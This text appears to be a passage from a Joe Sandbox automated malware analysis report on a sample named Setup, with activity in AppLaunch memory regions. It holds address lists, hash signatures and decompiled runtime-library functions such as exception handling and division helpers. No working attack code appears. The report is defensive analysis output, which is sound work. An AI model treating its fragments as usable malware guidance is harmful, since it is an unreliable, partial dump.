                                                                                                                                                                                              0x004045bb
                                                                                                                                                                                              0x004045be
                                                                                                                                                                                              0x00404619
                                                                                                                                                                                              0x00404619
                                                                                                                                                                                              0x0040461d
                                                                                                                                                                                              0x00404627
                                                                                                                                                                                              0x0040462c
                                                                                                                                                                                              0x0040462f
                                                                                                                                                                                              0x0040462f
                                                                                                                                                                                              0x00404632
                                                                                                                                                                                              0x00404635
                                                                                                                                                                                              0x00404637
                                                                                                                                                                                              0x00404639
                                                                                                                                                                                              0x00404639
                                                                                                                                                                                              0x0040463b
                                                                                                                                                                                              0x00404650
                                                                                                                                                                                              0x00404654
                                                                                                                                                                                              0x00404654
                                                                                                                                                                                              0x004045c0
                                                                                                                                                                                              0x004045c2
                                                                                                                                                                                              0x004045f5
                                                                                                                                                                                              0x004045fa
                                                                                                                                                                                              0x00404600
                                                                                                                                                                                              0x00404603
                                                                                                                                                                                              0x00404605
                                                                                                                                                                                              0x00404607
                                                                                                                                                                                              0x00404607
                                                                                                                                                                                              0x0040460d
                                                                                                                                                                                              0x00404611
                                                                                                                                                                                              0x00404611
                                                                                                                                                                                              0x00404611
                                                                                                                                                                                              0x00404615
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00404615
                                                                                                                                                                                              0x004045cb
                                                                                                                                                                                              0x004045ce
                                                                                                                                                                                              0x004045cf
                                                                                                                                                                                              0x004045d1
                                                                                                                                                                                              0x004045d3
                                                                                                                                                                                              0x004045d6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004045d8
                                                                                                                                                                                              0x004045df
                                                                                                                                                                                              0x004045e2
                                                                                                                                                                                              0x004045ec
                                                                                                                                                                                              0x004045ee
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004045f0
                                                                                                                                                                                              0x004045f3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004045f3
                                                                                                                                                                                              0x004045da
                                                                                                                                                                                              0x004045dd
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004045dd
                                                                                                                                                                                              0x00404598
                                                                                                                                                                                              0x0040459d
                                                                                                                                                                                              0x004045a6
                                                                                                                                                                                              0x004045a6
                                                                                                                                                                                              0x0040464c
                                                                                                                                                                                              0x0040464c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040464e
                                                                                                                                                                                              0x00404537
                                                                                                                                                                                              0x00404538
                                                                                                                                                                                              0x0040453b
                                                                                                                                                                                              0x0040453e
                                                                                                                                                                                              0x0040454b
                                                                                                                                                                                              0x00404550
                                                                                                                                                                                              0x00404553
                                                                                                                                                                                              0x0040455f
                                                                                                                                                                                              0x00404565
                                                                                                                                                                                              0x00404568
                                                                                                                                                                                              0x0040456b
                                                                                                                                                                                              0x0040456d
                                                                                                                                                                                              0x00404570
                                                                                                                                                                                              0x00404571
                                                                                                                                                                                              0x00404577
                                                                                                                                                                                              0x0040457a
                                                                                                                                                                                              0x0040458a
                                                                                                                                                                                              0x0040458c
                                                                                                                                                                                              0x0040458f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040453e
                                                                                                                                                                                              0x004044e3
                                                                                                                                                                                              0x004044e5
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004044e7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004044e7
                                                                                                                                                                                              0x004044d3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004044d3
                                                                                                                                                                                              0x004044bc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004044c2
                                                                                                                                                                                              0x004044c2
                                                                                                                                                                                              0x004044c7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004044cb
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004044cd
                                                                                                                                                                                              0x004044bc

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: __aulldiv
                                                                                                                                                                                              • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                              • API String ID: 3732870572-1956417402
                                                                                                                                                                                              • Opcode ID: 21b93df2df0abb88e55a92f3d4586199a9231edb61ff256f6502085d19df742f
                                                                                                                                                                                              • Instruction ID: 16f910f8d5ac90f38036fea1f62aec0ddc328f5904bcc7352a69aeb1ac58b286
                                                                                                                                                                                              • Opcode Fuzzy Hash: 21b93df2df0abb88e55a92f3d4586199a9231edb61ff256f6502085d19df742f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E618FF0A0024A9FCF15CEA988416BFBBB5AF85310F14447BE650B3391D37C9E558B6A
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00408402 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 89%
                                                                                                                                                                                              			E00408402(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;

				_t30 = __eflags;
				_t28 = __esi;
				_t27 = __edi;
				_t26 = __edx;
				_t19 = __ebx;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E00405014(__ebx, __edx, __edi, __esi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E0040BE6F(__ebx, __edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E0040BE6F(_t19, _t26, _t27, _t30);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
								_t17 = E00404FED(_t37,  *((intOrPtr*)(_t28 + 0x18)));
								_t38 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t29 + 0x10)));
									_push(_t28);
									return E00408187(_t38);
								}
							}
						}
					}
				}
				return _t17;
			}






                                                                                                                                                                                              0x00408402
                                                                                                                                                                                              0x00408402
                                                                                                                                                                                              0x00408402
                                                                                                                                                                                              0x00408402
                                                                                                                                                                                              0x00408402
                                                                                                                                                                                              0x00408405
                                                                                                                                                                                              0x0040840b
                                                                                                                                                                                              0x00408419
                                                                                                                                                                                              0x0040841f
                                                                                                                                                                                              0x00408427
                                                                                                                                                                                              0x00408433
                                                                                                                                                                                              0x0040843b
                                                                                                                                                                                              0x00408443
                                                                                                                                                                                              0x00408457
                                                                                                                                                                                              0x00408459
                                                                                                                                                                                              0x0040845d
                                                                                                                                                                                              0x00408462
                                                                                                                                                                                              0x00408468
                                                                                                                                                                                              0x0040846a
                                                                                                                                                                                              0x0040846c
                                                                                                                                                                                              0x0040846f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00408476
                                                                                                                                                                                              0x0040846a
                                                                                                                                                                                              0x0040845d
                                                                                                                                                                                              0x00408457
                                                                                                                                                                                              0x00408443
                                                                                                                                                                                              0x00408477

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00405014: __getptd.LIBCMT ref: 0040501A
                                                                                                                                                                                                • Part of subcall function 00405014: __getptd.LIBCMT ref: 0040502A
                                                                                                                                                                                              • __getptd.LIBCMT ref: 00408411
                                                                                                                                                                                                • Part of subcall function 0040BE6F: __getptd_noexit.LIBCMT ref: 0040BE72
                                                                                                                                                                                                • Part of subcall function 0040BE6F: __amsg_exit.LIBCMT ref: 0040BE7F
                                                                                                                                                                                              • __getptd.LIBCMT ref: 0040841F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                              • API String ID: 803148776-1018135373
                                                                                                                                                                                              • Opcode ID: 74d4149e526c6d07797b25c8e3bb25954539b8609e7c943311d28f5408997d77
                                                                                                                                                                                              • Instruction ID: e6f65704d801cc25ebc18efd85ee3ff3b111fad860c9254d40ba4891ff43c152
                                                                                                                                                                                              • Opcode Fuzzy Hash: 74d4149e526c6d07797b25c8e3bb25954539b8609e7c943311d28f5408997d77
                                                                                                                                                                                              • Instruction Fuzzy Hash: BA0162358002068ACF34AF61D540AAEB3B5AF10315F94493FE4C0B67E1DF388985DF99
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00401C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00401C80() {
				char _v44;
				char _v72;

				E00401030( &_v72, "vector<T> too long");
				E00401CC0( &_v44,  &_v72);
				E004052CB( &_v44, 0x427ee0);
				return E00401070( &_v72);
			}





                                                                                                                                                                                              0x00401c8e
                                                                                                                                                                                              0x00401c9a
                                                                                                                                                                                              0x00401ca8
                                                                                                                                                                                              0x00401cb8

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • std::bad_exception::bad_exception.LIBCMTD ref: 00401C9A
                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00401CA8
                                                                                                                                                                                                • Part of subcall function 004052CB: RaiseException.KERNEL32(?,?,00405581,?,?,?,?,?,00405581,#"@,00428078,00455F3C,00402223,00000000,00000000), ref: 0040530D
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                                                                              • API String ID: 1843230569-3788999226
                                                                                                                                                                                              • Opcode ID: d94e5b3e977f91be6db71c931a90d1eda41ad034ea396dd362db05dbff10d4cd
                                                                                                                                                                                              • Instruction ID: 4287e7378055b056d19e61ca9ff6320542c1cc3f70eb82202269017d6c3e8c1f
                                                                                                                                                                                              • Opcode Fuzzy Hash: d94e5b3e977f91be6db71c931a90d1eda41ad034ea396dd362db05dbff10d4cd
                                                                                                                                                                                              • Instruction Fuzzy Hash: 14E0EC7196424856C704FBA2D953DEEB73CD914394F90026EF401321E1AE39BE558AAD
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                              Function 091630F1 Relevance: 2.1, Strings: 1, Instructions: 845COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: @B/
                                                                                                                                                                                              • API String ID: 0-3863299084
                                                                                                                                                                                              • Opcode ID: 774ec69f876cf5c9516257539a7a3a1563a632d6cbc74ff4707c2653a43895f9
                                                                                                                                                                                              • Instruction ID: 7f6dd5c44ae2c91d413db4ae351335d5e23536d15a6ba3a913a80d8eb35abac7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 774ec69f876cf5c9516257539a7a3a1563a632d6cbc74ff4707c2653a43895f9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5892BF74E012298FDB64DF69C984BDDBBB2BB49304F1081EAD819A7360DB319E85CF54
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 091608E0 Relevance: 1.8, Strings: 1, Instructions: 520COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: (h
                                                                                                                                                                                              • API String ID: 0-2899713138
                                                                                                                                                                                              • Opcode ID: 66ba6978202f3bf7732b3d3167e656ad58577bf91276c81288bc7c9dc094dd47
                                                                                                                                                                                              • Instruction ID: 49f74c770076cfc7c7fe187d7d298f1dd67f96dead690c7603ca50f6868a3d0e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 66ba6978202f3bf7732b3d3167e656ad58577bf91276c81288bc7c9dc094dd47
                                                                                                                                                                                              • Instruction Fuzzy Hash: E8429D74E012298FDB64DF64C994BDEBBB2BB49304F1081EAD809AB355DB715E85CF80
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 05740B73 Relevance: 1.8, Strings: 1, Instructions: 507COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: p
                                                                                                                                                                                              • API String ID: 0-2181537457
                                                                                                                                                                                              • Opcode ID: fba9c24b198cf963f3a3c1ee01332d869f834ba5d0a522b6959949bde92756d3
                                                                                                                                                                                              • Instruction ID: f9afe2a44d8d0869e6c938f8e46740d072c38c28262e0e7f035502af7a4784fc
                                                                                                                                                                                              • Opcode Fuzzy Hash: fba9c24b198cf963f3a3c1ee01332d869f834ba5d0a522b6959949bde92756d3
                                                                                                                                                                                              • Instruction Fuzzy Hash: F532C4B4A00219CFDB54EF6AC984A9DFBF2BF49711F55C1A9C408AB211DB30E985CF61
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0574E6D8 Relevance: 1.2, Instructions: 1238COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 97b106cb69c3110cb2758856736dd65c740e9ba56762259896b8fc8256ea43eb
                                                                                                                                                                                              • Instruction ID: 3e02912b2e76dac0bf5626bbae61277f04e8fa269147ac4f079a445527ced46f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 97b106cb69c3110cb2758856736dd65c740e9ba56762259896b8fc8256ea43eb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0392C134B002058FDF15ABB8985463E7AF7BFC9311B64846EE806DB396EF758C019B52
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C3480 Relevance: .6, Instructions: 614COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: b6d65cc7087d99d4c5bd8bc26c98a06d0bf7e0eb015d117315945aab36796b17
                                                                                                                                                                                              • Instruction ID: 951e783b82c6092997adf11a19b81a59aea4bd05cc59b3deb120ed1fef2f8123
                                                                                                                                                                                              • Opcode Fuzzy Hash: b6d65cc7087d99d4c5bd8bc26c98a06d0bf7e0eb015d117315945aab36796b17
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6722BC34B013459FDB55AB39D854A2EBBE6EFC5210B5484AAD806CB392DF39EC01CB91
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 09161AF7 Relevance: .6, Instructions: 564COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 01e66ec415702af1ab8dfb8354e561d9a81e1d5d60f0431fce84fe485c658dcd
                                                                                                                                                                                              • Instruction ID: e8e98f6ae1bc838528d655c25873ee9dc711648a79fed0875bf12e82792e640e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 01e66ec415702af1ab8dfb8354e561d9a81e1d5d60f0431fce84fe485c658dcd
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9742A074E052298FDB64DF69C894BDDBBB2BF49304F2081AAD409AB354DB359E85CF40
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 05741EF0 Relevance: .5, Instructions: 506COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: e54a89f40ef880e88c6c623e92ea97a0d44475acf3ab4d34163b825d62385fc3
                                                                                                                                                                                              • Instruction ID: 82ab67148a27e9043874e8acc06b680cdf3ca6e435fcb2ba3670bb1d80f0a6b9
                                                                                                                                                                                              • Opcode Fuzzy Hash: e54a89f40ef880e88c6c623e92ea97a0d44475acf3ab4d34163b825d62385fc3
                                                                                                                                                                                              • Instruction Fuzzy Hash: FD428F78E15219CFDB54CFA9C984B9DBBB2BF48310F1081A9E809A7355DB30AA85DF50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 05740448 Relevance: .5, Instructions: 486COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0d53f92367834f4268cb507a4497eb7f76280533629215b164e1104c871edcbe
                                                                                                                                                                                              • Instruction ID: 7131421f84326ec93d2a317f366943bd5587bdbbd5b671362c9b48e986189418
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d53f92367834f4268cb507a4497eb7f76280533629215b164e1104c871edcbe
                                                                                                                                                                                              • Instruction Fuzzy Hash: B932C3B4A01219CFDB54DF6AC988A8EFBB2FF48711F55C199C548AB211CB30D985CFA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0916E615 Relevance: .4, Instructions: 407COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: da1c009c1152febc9424a79b80c890e1bbf1a383d81b427d5ab75518d34b8cca
                                                                                                                                                                                              • Instruction ID: 232081675a4413a674e40cbde27fe68302110fc3298d4c642d9f0b264345502d
                                                                                                                                                                                              • Opcode Fuzzy Hash: da1c009c1152febc9424a79b80c890e1bbf1a383d81b427d5ab75518d34b8cca
                                                                                                                                                                                              • Instruction Fuzzy Hash: 32F1E574E05229CFDB64CF69C994B9DBBB2BF89304F2081AAD409AB351DB315E85CF50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 09163FD0 Relevance: .4, Instructions: 385COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: d4265a87d2e33179badf9f86a6ba69d5d357664941f0b47f713996e9e2646759
                                                                                                                                                                                              • Instruction ID: 553785b50258b93325057c47ea41c07452045f966384c42eb77ecc1718182e40
                                                                                                                                                                                              • Opcode Fuzzy Hash: d4265a87d2e33179badf9f86a6ba69d5d357664941f0b47f713996e9e2646759
                                                                                                                                                                                              • Instruction Fuzzy Hash: B702A374E01229CFDB64DF69C844BDDBBB2BF49314F1081AAD409AB3A5DB309A85CF51
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0CB58F Relevance: .3, Instructions: 344COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 7341dc9e718c01a556ed3618179f5dd146b787478af1bd42edc8646b2032df9d
                                                                                                                                                                                              • Instruction ID: 9cc17211fad7cead4281638a8cd8be9fc7e08c894cfd9344496dd3664c6e0245
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7341dc9e718c01a556ed3618179f5dd146b787478af1bd42edc8646b2032df9d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 31D1BD747002029BCB64DF79D89966EBBE2EF80310F50C96DD9168F2A7DB35E844CB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 09161450 Relevance: .3, Instructions: 324COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 9e6f61361f0fdf377aa1afbb66da24ae009998739396b76a85eb42e85509ee0a
                                                                                                                                                                                              • Instruction ID: 411fbff38a8d4f9e637555b0cc24826ae121e210260a92e7848b540379d9db42
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e6f61361f0fdf377aa1afbb66da24ae009998739396b76a85eb42e85509ee0a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 32F1B374E05219CFDB64DFA5C984B9DBBB2BF89304F2081AAD409AB354DB315E85CF50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0916D920 Relevance: .3, Instructions: 259COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 4cc4f479a9cc82f4cd4ce7798f65b5ac887ef8821519e9be722595e908c63be5
